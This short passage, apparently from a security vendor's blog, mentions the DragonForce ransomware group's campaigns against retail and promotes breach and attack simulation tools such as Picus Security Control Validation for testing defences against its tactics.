The DragonForce ransomware group follows a clear sequence of behaviors. Implementing Breach and Attack Simulation (BAS) platforms, such as Picus Security Control Validation (SCV), enables security teams to emulate realistic, multi-stage attack scenarios that mirror the tactics, techniques, and procedures (TTPs) observed in their campaigns targeting the retail sector.
By continuously testing your environment against these scenarios, BAS tools can expose blind spots, validate existing controls, and generate actionable insights to improve detection and response capabilities—helping you stay one step ahead of sophisticated adversaries.